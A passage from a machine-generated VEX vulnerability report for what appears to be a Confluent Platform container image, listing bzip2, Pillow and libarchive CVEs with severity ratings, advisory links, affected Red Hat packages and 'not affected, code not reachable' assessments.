          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42250",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "bzip2 contains an off\u2011by\u2011one error in the bzip2recover utility. When processing a specially crafted file, the application performs an out\u2011of\u2011bounds write to a global buffer, resulting in memory corruption and a crash (denial of service).\n\nThis issue was fixed in bzip2 patch\u00a035d122a3df8b0cc4082a4d89fdc6ee99f375fe67",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42250"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42250"
        },
        {
          "url": "https://cert.pl/en/posts/2026/05/CVE-2026-42250/"
        },
        {
          "url": "https://inbox.sourceware.org/bzip2-devel/20260528145407.293768-1-mark@klomp.org/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42250"
        },
        {
          "url": "https://sourceware.org/bzip2/"
        },
        {
          "url": "https://sourceware.org/cgit/bzip2/commit/?id=35d122a3df8b0cc4082a4d89fdc6ee99f375fe67"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42250"
        }
      ],
      "published": "2026-05-28T14:16:19+00:00",
      "updated": "2026-06-17T10:47:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.0.8-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/bzip2-libs@1.0.8-11.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42308",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42308"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42308"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pillow/PYSEC-2026-165.yaml"
        },
        {
          "url": "https://github.com/python-pillow/Pillow"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/pull/9518/changes%20%28suspected%20fix%29"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42308"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8399-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42308"
        }
      ],
      "published": "2026-05-09T06:16:09+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4426",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1335
      ],
      "description": "A flaw was found in libarchive. An Undefined Behavior vulnerability exists in the zisofs decompression logic, caused by improper validation of a field (`pz_log2_bs`) read from ISO9660 Rock Ridge extensions. A remote attacker can exploit this by supplying a specially crafted ISO file. This can lead to incorrect memory allocation and potential application crashes, resulting in a denial-of-service (DoS) condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4426"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449010"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2897"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4426"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8292-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4426"
        }
      ],
      "published": "2026-03-19T15:16:28+00:00",
      "updated": "2026-06-17T10:56:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44431",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
